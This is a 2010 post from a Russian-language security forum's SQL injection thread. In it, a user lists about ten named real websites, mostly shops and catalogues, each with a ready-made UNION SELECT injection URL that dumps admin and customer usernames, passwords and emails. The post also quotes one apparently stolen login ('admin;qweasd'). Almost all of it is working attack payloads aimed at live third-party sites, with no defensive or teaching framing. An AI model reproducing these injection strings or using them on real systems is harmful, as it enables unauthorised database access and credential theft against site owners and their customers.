ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу SQL Инъекции
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #11  
Старый 28.03.2010, 02:21
jecka3000
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341

Репутация: 95
По умолчанию
machinz.co.uk

вся инфа в исходном коде страницы
Код:
http://www.machinz.co.uk/Productview.php?product=-2+and+1=2+union+select+1,concat(Username,0x20,Password,0x20,Email)+from+LoginUsers--
jagz.co.uk
Код:
http://www.jagz.co.uk/menu.php?CategoryID=-9+union+select+1,2,concat(AdminName,0x20,AdminPwd),4,5,6,7,8,9+from+Admin--
biblios.pijnenburg.it
Код:
http://biblios.pijnenburg.it/title.php?param=-1547+union+select+1,2,3,4,concat(username,0x20,password),6,7,8,9,10,11+from+tblUser--
www.vivliokritiki.gr
Код:
http://www.vivliokritiki.gr/title.php?id=-6+union+select+1,concat(email,0x20,password),3,4,5,6,7,8,9,10,11,12+from+users--
jetproducts.co.uk
в исходном коде
Код:
http://www.jetproducts.co.uk/details.php?prod_id=-159+union+select+1,concat(username,0x20,password,0x20,email),3,4+from+zebra_admin--
istitutocam.com
Код:
http://www.istitutocam.com/pagina-istituto-cam.php?id=-3+union+select+1,2,concat(username,0x20,password,0x20,email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+clienti--
www.liveview.cz
Код:
http://www.liveview.cz/cam.php?id=-31+union+select+1,concat(login,0x20,pwd)+from+lv_users--
Код:
admin;qweasd
salesbearing.com
вывод в тайтле
Код:
http://www.salesbearing.com/products/product.php?id=-31+union+select+1,concat(username,0x20,pwd),3,4+from+admin--
moretonisland.com.au
Код:
http://www.moretonisland.com.au/product.php?id=-67753+union+select+1,2,concat(username,0x20,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+customers--
edra.com
Код:
http://www.edra.com/product.php?id=-42+union+select+1,2,3,4,5,concat(user(),0x20,database(),0x20,version()),7,8,9,10,11,12,13,14,15,16,17,18--
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ